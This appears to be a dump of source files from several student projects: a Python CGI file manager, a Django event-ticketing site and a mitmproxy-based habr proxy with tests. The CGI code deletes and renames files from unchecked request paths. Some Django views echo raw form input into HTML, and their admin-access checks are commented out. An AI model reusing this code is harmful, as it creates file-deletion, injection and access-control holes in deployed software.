html+=\"\"\"\n <div >\n <form action=\"/cgi-bin/editFile.py\" target='_blank'>\n <input type=\"hidden\" name=\"path\" class=\"rename\" value=\"%s\" >\n <input type=\"hidden\" name=\"editAction\" class=\"rename\" value=\"rename\">\n <input type=\"hidden\" name=\"selectedfile\" id=\"selectedfile\" class=\"rename\" >\n <input type=\"text\" name=\"newName\" class=\"rename\" placeholder=\"Enter a new name\" hidden/>\n \n <input type = \"submit\" class=\"rename\" id=\"renameBtn\" value = \"Rename\" hidden/>\n </form>\n \"\"\"%(current_path)\n\n html+=\"\"\"\n <form style=\"float: left; padding: 5px;\">\n <input type = \"submit\" name=\"edit\" class=\"delete\" id=\"deleteBtn\" value = \"Delete\" hidden/>\n </form>\n </div>\n \"\"\" \n html += \"</body>\" + \"\\n\"\n \n \n html += \"</html>\" + \"\\n\"\n return html\n\n\nform = cgi.FieldStorage() \nuser_path = form.getvalue('path')\nnewName = form.getvalue('newName')\nselectFile = form.getvalue('checkedItem')\neditAction = form.getvalue('edit')\n\nif(user_path == None):\n print(main())\nelif(editAction == \"Rename\"):\n if(newName != None):\n currentPath= user_path\n oldName = os.path.join(currentPath, selectFile)\n newName = os.path.join(currentPath, newName)\n os.rename(oldName, newName)\n print(main(user_path))\nelif(editAction == \"Delete\"):\n currentPath = os.path.join(user_path, selectFile)\n if os.path.isdir(currentPath):\n os.rmdir(currentPath)\n else:\n os.remove(currentPath)\n print(main(user_path))\nelse:\n print(main(user_path))\n\nprint()\n\n\n"
}
] | 5 |
mateuszgrzyb/confexplore
|
https://github.com/mateuszgrzyb/confexplore
|
af0a3e82f25590102d580021c6761eda0bdb87a0
|
9dc1c7bab7a94806cbe498a27fbb6bf103b99cec
|
abe8984b3975ac4aeb6f3b6a8a480bcfb73d7b86
|
refs/heads/master
| 2023-02-24T18:15:08.341043 | 2021-01-25T20:50:48 | 2021-01-25T20:50:48 | 322,600,648 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6628352403640747,
"alphanum_fraction": 0.6649250984191895,
"avg_line_length": 28.597938537597656,
"blob_id": "b15315eb1a2f03aa390cc1ce68d5afabe8e0003a",
"content_id": "2f4197b3764dadd998d2d0bb4de2837c1f1c0b12",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2876,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 97,
"path": "/users/views.py",
"repo_name": "mateuszgrzyb/confexplore",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth import logout\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.mixins import UserPassesTestMixin\nfrom django.contrib.auth.views import LoginView as BaseLoginView\nfrom django.http import HttpResponseRedirect, HttpRequest, HttpResponse\nfrom django.shortcuts import render, redirect\n\n# Create your views here.\nfrom django.urls import reverse_lazy\nfrom django.views import View\nfrom django.views.generic import CreateView\n\n# from users.forms import RegistrationForm\n\n# ---------------------\nfrom django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.views.generic import TemplateView\n\nfrom .forms import UserRegisterForm\nfrom .models import Profile\n\n\nclass LoginView(BaseLoginView):\n template_name = 'users/login.html'\n\n\ndef register_view(request):\n if request.method == 'POST':\n form = UserRegisterForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n if form.cleaned_data.get('rodzaj_użytkownika') == '1':\n # opcja zwykłego użytkownika \n print(1)\n if form.cleaned_data.get('rodzaj_użytkownika') == '2':\n # opcja wolontriusza \n print(2)\n if form.cleaned_data.get('rodzaj_użytkownika') == '3':\n # opcja organizatora \n print(1)\n messages.success(request, f'Account created for {username}!')\n return redirect('home')\n else:\n form = UserRegisterForm()\n return render(request, 'users/register.html', {'form': form})\n\n\n# class RegisterView(CreateView):\n# pass\n# form_class = RegistrationForm\n# success_url = reverse_lazy('home')\n# template_name = 'users/register.html'\n#\n# def form_valid(self, form: RegistrationForm) -> HttpResponseRedirect:\n# valid = super(RegisterView, self).form_valid(form)\n# return valid\n\n\nclass LogoutView(View):\n def get(self, request: HttpRequest) -> HttpResponse:\n logout(request)\n return redirect('login')\n\n\nclass ResetPasswordView(View):\n pass\n\n\nclass AdminRequiredMixin(LoginRequiredMixin, UserPassesTestMixin):\n def test_func(self):\n return self.request.user.role_name == 'A'\n\n\nclass ManageUsersView(\n #AdminRequiredMixin,\n TemplateView):\n\n template_name = 'users/manageusers.html'\n extra_context = {\n 'profiles': Profile.objects.exclude(role_name='A')\n }\n\n\nclass ConfirmUserView(\n #AdminRequiredMixin,\n View):\n def post(self, request: HttpRequest) -> HttpResponse:\n pk = request.POST[\"pk\"]\n print(request.POST)\n p: Profile = Profile.objects.get(pk=pk)\n r = p.get_role()\n print(f'\\n\\nCONFIRM USER PK: {pk}')\n r.blocked = not r.blocked\n r.save()\n return redirect('manage_users')\n"
},
{
"alpha_fraction": 0.47211897373199463,
"alphanum_fraction": 0.49070632457733154,
"avg_line_length": 23.454545974731445,
"blob_id": "722e0841874405b934aebb596bb69aa650d08dc6",
"content_id": "a9884002e83d80a806893ed3d0e72ed5e2ddf751",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 269,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 11,
"path": "/templates/misc/faq.html",
"repo_name": "mateuszgrzyb/confexplore",
"src_encoding": "UTF-8",
"text": "{% extends 'main.html' %}\n{% block content %}\n <div class=\"jumbotron mt-5\">\n <h2>FAQ</h2><br>\n {% for point in faq %}\n <h4>{{ forloop.counter }}. {{ point.question }}?</h4>\n <p>{{ point.answer }}</p>\n <br>\n {% endfor %}\n </div>\n{% endblock %}\n"
},
{
"alpha_fraction": 0.6175024509429932,
"alphanum_fraction": 0.6184857487678528,
"avg_line_length": 29.133333206176758,
"blob_id": "e702d0b42f5f42cec0a837e11f8d5999c2051c30",
"content_id": "f1946704f3d36ef3fc98f55e84f1a272504583e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4068,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 135,
"path": "/content/views.py",
"repo_name": "mateuszgrzyb/confexplore",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.models import AnonymousUser\nfrom django.http import HttpResponse, HttpRequest\nfrom django.shortcuts import render\n\n# Create your views here.\nfrom django.urls import reverse\nfrom django.urls import reverse_lazy\nfrom django.views import View\nfrom django.views.generic import FormView\n\nfrom .forms import AddEventForm\nfrom .models import Event, City, Type\n\n\n\nclass LoggedView(LoginRequiredMixin, View):\n login_url = reverse_lazy('login')\n\n\n# def wrapper(context: dict, request: HttpRequest) -> dict:\n# context['types'] = Type.objects.all()\n#\n# context['cities'] = City.objects.all()\n#\n# try:\n# context['user_type'] = request.user.profile.get_role()\n# except AttributeError:\n# pass\n# return context\n\n\nclass HomeView(View):\n def get(self, request: HttpRequest):\n context = {\n 'events': Event.objects.all()\n }\n return render(request, 'content/home.html', context)\n\n def post(self, request: HttpRequest):\n keys = ['name', 'type', 'city', 'events']\n kwars = {key: request.POST[key] for key in keys}\n html = \"\\n\".join(f'<p>{k}: \\\"{v}\\\"' for k, v in kwars.items())\n return HttpResponse(html)\n\n\nclass SearchView(View):\n def get(self, request):\n name = self.request.GET.get('q', '')\n e_type = int(self.request.GET.get('type', '-1'))\n city = int(self.request.GET.get('city', '-1'))\n\n query = {}\n if name:\n query['name__icontains'] = name\n if e_type != -1:\n query['type__id'] = e_type\n if city != -1:\n query['localization__id'] = city\n\n return render(request, 'content/search.html', {\n 'events': Event.objects.filter(**query)\n })\n\n\nclass TicketOwnedView(View):\n def get(self, request: HttpRequest):\n return render(request, 'content/ticketOwned.html')\n\n def post(self, request: HttpRequest):\n keys = ['name', 'type', 'city']\n kwars = {key: request.POST[key] for key in keys}\n html = \"\\n\".join(f'<p>{k}: \\\"{v}\\\"' for k, v in kwars.items())\n return HttpResponse(html)\n\n\nclass YourEventsView(View):\n def get(self, request: HttpRequest):\n context = {\n 'events': Event.objects.all()\n }\n return render(request, 'content/yourEvents.html', context)\n\n def post(self, request: HttpRequest):\n keys = ['name', 'type', 'city']\n kwars = {key: request.POST[key] for key in keys}\n html = \"\\n\".join(f'<p>{k}: \\\"{v}\\\"' for k, v in kwars.items())\n return HttpResponse(html)\n\n\nclass EventsToAcceptView(View):\n def get(self, request: HttpRequest):\n return render(request, 'content/eventsToAccept.html')\n\n def post(self, request: HttpRequest):\n keys = ['name', 'type', 'city']\n kwars = {key: request.POST[key] for key in keys}\n html = \"\\n\".join(f'<p>{k}: \\\"{v}\\\"' for k, v in kwars.items())\n return HttpResponse(html)\n\n\nclass eventPreviewView(View):\n def get(self, request: HttpRequest):\n return render(request, 'content/eventPreview.html')\n\n def post(self, request: HttpRequest):\n keys = ['name', 'type', 'city']\n kwars = {key: request.POST[key] for key in keys}\n html = \"\\n\".join(f'<p>{k}: \\\"{v}\\\"' for k, v in kwars.items())\n return HttpResponse(html)\n\n\nclass buyHowManyView(View):\n def get(self, request: HttpRequest):\n return render(request, 'content/buyHowMany.html')\n\n\nclass buyWhatView(View):\n def get(self, request: HttpRequest):\n return render(request, 'content/buyWhat.html')\n\n\nclass transactionView(View):\n def get(self, request: HttpRequest):\n return render(request, 'content/transaction.html')\n\n\nclass AddEventView(FormView):\n form_class = AddEventForm\n template_name = 'content/addevent.html'\n success_url = reverse_lazy('home')\n\n def form_valid(self, form: form_class):\n Event.objects.create(**form.cleaned_data)\n return super().form_valid(form)\n"
},
{
"alpha_fraction": 0.5877318382263184,
"alphanum_fraction": 0.6148359775543213,
"avg_line_length": 28.20833396911621,
"blob_id": "292616b792582c79839ed57b5ea6318fde20fb28",
"content_id": "ea1c94d54dbe2d50006e3b4188bb3d46e3ed541b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 702,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 24,
"path": "/content/migrations/0002_auto_20210124_0112.py",
"repo_name": "mateuszgrzyb/confexplore",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.1.5 on 2021-01-24 00:12\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('content', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='event',\n name='localization',\n field=models.ForeignKey(default='Warszawa', on_delete=django.db.models.deletion.CASCADE, to='content.city'),\n ),\n migrations.AlterField(\n model_name='event',\n name='type',\n field=models.ForeignKey(default='Ogólna', on_delete=django.db.models.deletion.CASCADE, to='content.type'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6836734414100647,
"alphanum_fraction": 0.6938775777816772,
"avg_line_length": 29.799999237060547,
"blob_id": "1772d566f0eb439958f6f6199a3aded555a9ec18",
"content_id": "5bfbc45a38e1cb408f5211534a256229dca0ffc0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1080,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 35,
"path": "/content/models.py",
"repo_name": "mateuszgrzyb/confexplore",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\n# Create your models here.\nfrom users.models import NormalUser\n\n\nclass City(models.Model):\n name = models.CharField(max_length=50, default='Warszawa')\n\n def __str__(self):\n return self.name\n\n\nclass Type(models.Model):\n name = models.CharField(max_length=100, default='Ogólna')\n\n def __str__(self):\n return self.name\n\n\nclass Event(models.Model):\n # class Schedule(models.Model):\n # event = models.ForeignKey('Event', on_delete=models.CASCADE)\n # date = models.DateTimeField()\n\n name = models.CharField(max_length=100, default='konferencja')\n info = models.TextField(blank=True)\n localization = models.ForeignKey('City', on_delete=models.CASCADE, default=\"Warszawa\")\n type = models.ForeignKey('Type', on_delete=models.CASCADE, default=\"Ogólna\")\n date = models.CharField(max_length=30, default='1 stycznia')\n\n\nclass Ticket(models.Model):\n event = models.ForeignKey(Event, on_delete=models.CASCADE)\n owner = models.ManyToManyField(NormalUser, blank=True, related_name='tickets')\n"
},
{
"alpha_fraction": 0.597484290599823,
"alphanum_fraction": 0.601257860660553,
"avg_line_length": 26.241378784179688,
"blob_id": "c0f64181a8e4a2cee101d02fdec3682d121ede33",
"content_id": "aed69c1a55d4beb66fa36dbfc3487e9453a078d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 796,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 29,
"path": "/users/forms.py",
"repo_name": "mateuszgrzyb/confexplore",
"src_encoding": "UTF-8",
"text": "# from django.contrib.auth.forms import UserCreationForm\n# from users.models import NormalUser\n# class RegistrationForm(UserCreationForm):\n#\n# class Meta:\n# model = User\n# fields = [\n# 'username',\n# 'email',\n# 'password1',\n# 'password2',\n# ]\n#\nfrom django import forms\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserCreationForm\n\nROLE =( \n (\"1\", \"Uczestnik\"), \n (\"2\", \"Wolontariusz\"), \n (\"3\", \"Organizator\"), \n)\n\nclass UserRegisterForm(UserCreationForm):\n email = forms.EmailField()\n rodzaj_użytkownika = forms.ChoiceField(choices = ROLE)\n class Meta:\n model = User\n fields = ['username', 'email', 'password1', 'password2','rodzaj_użytkownika']\n \n"
},
{
"alpha_fraction": 0.5452784299850464,
"alphanum_fraction": 0.5598062872886658,
"avg_line_length": 37.96226501464844,
"blob_id": "5e82fc0cee795c63337b6d382d55e39aaa4b70a6",
"content_id": "51c36b0f8caae30f9c5de61e90bfee26600fe61a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2066,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 53,
"path": "/content/migrations/0001_initial.py",
"repo_name": "mateuszgrzyb/confexplore",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.1.5 on 2021-01-24 00:10\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ('users', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='City',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(default='Warszawa', max_length=50)),\n ],\n ),\n migrations.CreateModel(\n name='Event',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(default='konferencja', max_length=100)),\n ('info', models.TextField(blank=True)),\n ('date', models.CharField(default='1 stycznia', max_length=30)),\n ('localization', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='content.city')),\n ],\n ),\n migrations.CreateModel(\n name='Type',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(default='Ogólna', max_length=100)),\n ],\n ),\n migrations.CreateModel(\n name='Ticket',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('event', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='content.event')),\n ('owner', models.ManyToManyField(blank=True, related_name='tickets', to='users.NormalUser')),\n ],\n ),\n migrations.AddField(\n model_name='event',\n name='type',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='content.type'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5280575752258301,
"alphanum_fraction": 0.5553956627845764,
"avg_line_length": 23.821428298950195,
"blob_id": "8a8f23a17b5f533e7070704c888dbf71e35973f3",
"content_id": "b0b66f80165be862277e5bcdec6eea5a488d886a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 695,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 28,
"path": "/users/migrations/0002_auto_20210124_2053.py",
"repo_name": "mateuszgrzyb/confexplore",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.1.4 on 2021-01-24 20:53\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('users', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='normaluser',\n name='blocked',\n field=models.BooleanField(default=False),\n ),\n migrations.AddField(\n model_name='organizer',\n name='blocked',\n field=models.BooleanField(default=False),\n ),\n migrations.AddField(\n model_name='volunteer',\n name='blocked',\n field=models.BooleanField(default=False),\n ),\n ]\n"
}
] | 8 |
g1r0/habr-proxy
|
https://github.com/g1r0/habr-proxy
|
9e6434e1292172ff9198c93087a7c47fd5cf7988
|
752a6308ba795db92d39d50a5cdd565615b7ef5d
|
c18ac4d05ef72fdd5c412a2218707db789b520cc
|
refs/heads/master
| 2020-04-03T15:33:48.971244 | 2018-11-03T03:42:25 | 2018-11-03T03:42:25 | 155,366,946 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6414473652839661,
"alphanum_fraction": 0.6422697305679321,
"avg_line_length": 26.0222225189209,
"blob_id": "121895fbda33e3a2d6eaf740210664412cb5e473",
"content_id": "a94416dc60f36da72cba95d9e751b817dc0175c5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1216,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 45,
"path": "/src/server.py",
"repo_name": "g1r0/habr-proxy",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nimport os\n\nfrom mitmproxy import options\nfrom mitmproxy.tools.dump import DumpMaster\nfrom mitmproxy.tools.main import cmdline\nfrom mitmproxy.tools.main import run\n\nfrom habr_proxy.addons import ModifyHTMLContent\nfrom habr_proxy.modifiers import HTMLModificationManager\nfrom habr_proxy.modifiers import TmTransformHtmlAction\nfrom habr_proxy.modifiers import UrlTransformHtmlAction\n\n\nCONFIG_DIR_VAR = 'PROXY_CONFIG_DIR'\n\nCONFIG_PATH = os.environ.get(CONFIG_DIR_VAR, None)\nif CONFIG_PATH is None:\n raise ValueError(\n 'Environment variable %s not found.' % CONFIG_DIR_VAR\n )\n\n\nclass HabrDumpMaster(DumpMaster):\n\n \"\"\"Mitmdump mainloop object for habr-proxy.\"\"\"\n\n def __init__(self, opts: options.Options) -> None:\n \"\"\"Initialize extra addons.\"\"\"\n super().__init__(opts)\n\n self.addons.add(\n ModifyHTMLContent(\n manager=HTMLModificationManager(\n actions=(\n TmTransformHtmlAction,\n UrlTransformHtmlAction,\n )\n )\n )\n )\n\n\nif __name__ == \"__main__\":\n proxy = run(HabrDumpMaster, cmdline.mitmdump, ('--confdir', CONFIG_PATH))\n"
},
{
"alpha_fraction": 0.6291946172714233,
"alphanum_fraction": 0.6560402512550354,
"avg_line_length": 17.625,
"blob_id": "f5eda532c5ae7a9fbaeb7bb245a872343ed76a33",
"content_id": "2f4c5bdfb157ba21d99595d91b841ff947f41e5a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 1192,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 64,
"path": "/README.rst",
"repo_name": "g1r0/habr-proxy",
"src_encoding": "UTF-8",
"text": "About\n_________________\n\nHabr-proxy project has been done for the `test challenge #1\n<https://github.com/ivelum/job/blob/master/code_challenges/python.md>`_.\n\nAssumptions\n_________________\n\n* Service will be run locally. No remotes.\n* Proxy is available at ``http://127.0.0.1:8080``.\n* Demo can be run with local environment or docker image.\n\nWhat was used\n_________________\n\n* Python 3.6\n* Mitmproxy\n* Docker\n* Pytest\n\nHow to run demo\n_________________\n\nDocker\n~~~~~~~\nInstructions for docker-powered demo can be found at ``docker/README.rst``.\n\nLocal python environment\n~~~~~~~~~~~~~~~~~~~~~~~~~\n1. Setup Python 3.6 environment and install dependencies for ``requirements/prod.txt``:\n\n::\n\n pip install -r requirements/prod.txt\n\n2. Set environment variable **PROXY_CONFIG_DIR** pointing to directory with ``config.yaml``.\n\n::\n\n export PROXY_CONFIG_DIR=/path/to/config_dir\n\n3. Run server with command:\n\n::\n\n python src/server.py\n\nProxy is now available at ``http://127.0.0.1:8080``.\n\nHow to run tests\n________________\n1. Setup Python 3.6 environment and install dependencies for ``requirements/prod.txt``:\n\n::\n\n pip install -r requirements/prod.txt\n\n\n2. Run Pytest with command:\n\n::\n\n pytest\n"
},
{
"alpha_fraction": 0.4365079402923584,
"alphanum_fraction": 0.5317460298538208,
"avg_line_length": 15.800000190734863,
"blob_id": "cd94c5ebb4fc03523a8c29495ce1b62dd03c642c",
"content_id": "016bba8d43234dc94eceb88c21a4045d6ff00433",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 252,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 15,
"path": "/docker/README.rst",
"repo_name": "g1r0/habr-proxy",
"src_encoding": "UTF-8",
"text": "Building image\n--------------------------\n\n::\n\n docker build -t habr_proxy -f docker/Dockerfile .\n\nRunning demo\n--------------------------\n\n::\n\n docker run -it -p 127.0.0.1:8080:8080 habr_proxy\n\nService is now available at ``http://127.0.0.1:8080``.\n"
},
{
"alpha_fraction": 0.6481481194496155,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 26,
"blob_id": "f14ae81cafce2973b24f3d0a69f58522905ec17c",
"content_id": "47d9281479d77f5c8bb1fdcf5c0bb174a5c778d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 54,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 2,
"path": "/src/habr_proxy/__init__.py",
"repo_name": "g1r0/habr-proxy",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\n\"\"\"Habr-proxy addons for mitmdump.\"\"\"\n"
},
{
"alpha_fraction": 0.4406392574310303,
"alphanum_fraction": 0.46518266201019287,
"avg_line_length": 29.736841201782227,
"blob_id": "062a77f5d30246b0fe9f59df69bfc2b0a8ff83cc",
"content_id": "dbeeff3bdc071c921dd6cfce4d5fe74f642ec0aa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 1752,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 57,
"path": "/docker/Dockerfile",
"repo_name": "g1r0/habr-proxy",
"src_encoding": "UTF-8",
"text": "FROM ubuntu:16.04\n\nENV LANG ru_RU.utf8\nENV PROXY_CONFIG_DIR /usr/src/app/config\n\nRUN set -ex \\\n # -------------------------------------------------------------------------\n # Installing required system packages.\n && apt-get update \\\n && DEBIAN_FRONTEND=noninteractive \\\n apt-get install --no-install-recommends --yes \\\n ca-certificates \\\n language-pack-ru \\\n wget \\\n g++ \\\n libpq-dev \\\n libssl-dev \\\n libffi-dev \\\n libxml2-dev \\\n libxslt1-dev \\\n libxmlsec1-dev \\\n libreadline-dev \\\n libbz2-dev \\\n && apt autoremove \\\n && apt-get clean \\\n && rm -rf /var/lib/apt/lists/* \\\n # -------------------------------------------------------------------------\n # Installing Python 3.6.5.\n && mkdir -p /usr/local/python/3.6 \\\n && cd /tmp \\\n && wget https://www.python.org/ftp/python/3.6.5/Python-3.6.5.tar.xz \\\n && tar -xJf Python-3.6.5.tar.xz \\\n && rm Python-3.6.5.tar.xz \\\n && cd Python-3.6.5 \\\n && ./configure \\\n --prefix=/usr/local/python/3.6 \\\n && make \\\n && make install \\\n && cd \\\n && rm -r /tmp/Python-3.6.5 \\\n && ln -s /usr/local/python/3.6/bin/python3.6 /usr/bin/python \\\n && ln -s /usr/local/python/3.6/bin/pip3 /usr/bin/pip \\\n && export PATH=/usr/local/python/3.6/bin:$PATH \\\n # -------------------------------------------------------------------------\n # Create project dir.\n && mkdir -p /usr/src/app\n\n\nWORKDIR /usr/src/app\nCOPY . .\n\nRUN set -ex \\\n # -------------------------------------------------------------------------\n # Installing environment requirements.\n && pip install --no-cache-dir -r requirements/prod.txt\n\nENTRYPOINT python /usr/src/app/src/server.py\n"
},
{
"alpha_fraction": 0.47595328092575073,
"alphanum_fraction": 0.4802473485469818,
"avg_line_length": 33.2470588684082,
"blob_id": "157ccb2ae13b9d0d7b0d421af01f15c4b9e9990a",
"content_id": "7fcbef2c06639576bf8a222895172d0f77ae0de7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5940,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 170,
"path": "/tests/test_transform_actions.py",
"repo_name": "g1r0/habr-proxy",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nfrom typing import Iterable\nfrom typing import Tuple\nfrom typing import Type\n\nfrom src.habr_proxy.modifiers import BaseTransformAction\nfrom src.habr_proxy.modifiers import TmTransformHtmlAction\nfrom src.habr_proxy.modifiers import UrlTransformHtmlAction\n\n\ndef verify_test_data(\n action: Type[BaseTransformAction],\n data: Iterable[Tuple[str, str]]\n) -> None:\n \"\"\"Verify data combinations using extra spaces.\"\"\"\n for input_data, expected_result in data:\n assert action(input_data).transform() == expected_result\n\n # also try combinations with extra spaces\n input_data = ' ' + input_data\n expected_result = ' ' + expected_result\n assert action(input_data).transform() == expected_result\n\n input_data = input_data + ' '\n expected_result = expected_result + ' '\n assert action(input_data).transform() == expected_result\n\n input_data = ' ' + input_data + ' '\n expected_result = ' ' + expected_result + ' '\n assert action(input_data).transform() == expected_result\n\n\nclass TestTmTransform:\n\n \"\"\"Check transformations for 6-letter words with ™ mark.\"\"\"\n\n action = TmTransformHtmlAction\n\n def test_word_rule(self) -> None:\n \"\"\"Check single 6-letter word transformation.\"\"\"\n test_sets = (\n ('change', 'change™'),\n ('nochange', 'nochange'),\n ('nochangenochange', 'nochangenochange'),\n ('Семёно', 'Семёно™'),\n ('ch1nge', 'ch1nge'),\n\n # enclosing literals\n ('(change)', '(change™)'),\n ('\"change\"', '\"change™\"'),\n ('”change”', '”change™”'),\n (\"'change'\", \"'change™'\"),\n ('`change`', '`change™`'),\n ('[change]', '[change™]'),\n ('{change}', '{change™}'),\n ('[change/change]', '[change™/change™]'),\n (r'[change\\change]', r'[change™\\change™]'),\n ('«change»', '«change™»'),\n ('« change »', '« change™ »'),\n\n # delimiters\n ('noedit-nochange', 'noedit-nochange'),\n ('noedit@nochange', 'noedit@nochange'),\n # .\n ('noedit.nochange', 'noedit.nochange'),\n ('change. nochange', 'change™. nochange'),\n ('change.<nochange>', 'change™.<nochange>'),\n # ,\n ('noedit,nochange', 'noedit,nochange'),\n ('change, nochange', 'change™, nochange'),\n ('change,<nochange>', 'change™,<nochange>'),\n # :\n ('noedit:nochange', 'noedit:nochange'),\n ('change: nochange', 'change™: nochange'),\n ('change:<nochange>', 'change™:<nochange>'),\n # ;\n ('noedit;nochange', 'noedit;nochange'),\n ('change; nochange', 'change™; nochange'),\n ('change;<nochange>', 'change™;<nochange>'),\n )\n\n verify_test_data(action=self.action, data=test_sets)\n\n def test_tag_definitions(self) -> None:\n \"\"\"Check no content changed in tag definitions (between <>).\"\"\"\n test_sets = (\n ('<noedit>', '<noedit>'),\n ('< noedit >', '< noedit >'),\n ('</noedit >', '</noedit >'),\n ('</ noedit>', '</ noedit>'),\n (\n 'change<noedit>change<noedit/ noedit > Семёно',\n 'change™<noedit>change™<noedit/ noedit > Семёно™',\n ),\n (\n 'change< noedit noedit>change<noedit/ noedit > Семёно',\n 'change™< noedit noedit>change™<noedit/ noedit > Семёно™',\n ),\n )\n\n verify_test_data(action=self.action, data=test_sets)\n\n def test_excluded_tags(self) -> None:\n \"\"\"Check no content is modified in excluded tags.\"\"\"\n test_sets = (\n (\n '<noedit>change<script noedit>noedit< /script>< /noedit>',\n '<noedit>change™<script noedit>noedit< /script>< /noedit>',\n ),\n (\n '''<noedit>change\n < iframe noedit>\n noedit\n <script noedit>\n noedit\n < /script>\n noedit\n </iframe>change\n < /noedit>''',\n '''<noedit>change™\n < iframe noedit>\n noedit\n <script noedit>\n noedit\n < /script>\n noedit\n </iframe>change™\n < /noedit>''',\n ),\n )\n\n verify_test_data(action=self.action, data=test_sets)\n\n\nclass PinnedUrlTransformHtmlAction(UrlTransformHtmlAction):\n\n @staticmethod\n def _get_replace_url() -> str:\n \"\"\"Pin replace URL string for test.\"\"\"\n return 'http://127.0.0.1:8080'\n\n\nclass TestUrlTransform:\n\n \"\"\"Check URL transformations for <a> tags.\"\"\"\n\n action = PinnedUrlTransformHtmlAction\n\n def test_url_replace(self) -> None:\n \"\"\"Check url transformation within <a> tag.\"\"\"\n test_sets = (\n (\n '''<li>\n <a href=\"https://habr.com/company/yandex/\"\n onclick=\"https://habr.com/company/yandex/\"\n rel=\"nofollow\">\n https://habr.com/company/yandex/\n </a>\n </li>''',\n '''<li>\n <a href=\"http://127.0.0.1:8080/company/yandex/\"\n onclick=\"https://habr.com/company/yandex/\"\n rel=\"nofollow\">\n https://habr.com/company/yandex/\n </a>\n </li>''',\n ),\n )\n\n verify_test_data(action=self.action, data=test_sets)\n"
},
{
"alpha_fraction": 0.6688172221183777,
"alphanum_fraction": 0.6741935610771179,
"avg_line_length": 32.21428680419922,
"blob_id": "4d1d1a2aeeb0cc39a5c284041cb368335218d39c",
"content_id": "fb6b52db5f27a569ef3c5f2bb99e9078bccd921d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 930,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 28,
"path": "/src/habr_proxy/addons.py",
"repo_name": "g1r0/habr-proxy",
"src_encoding": "UTF-8",
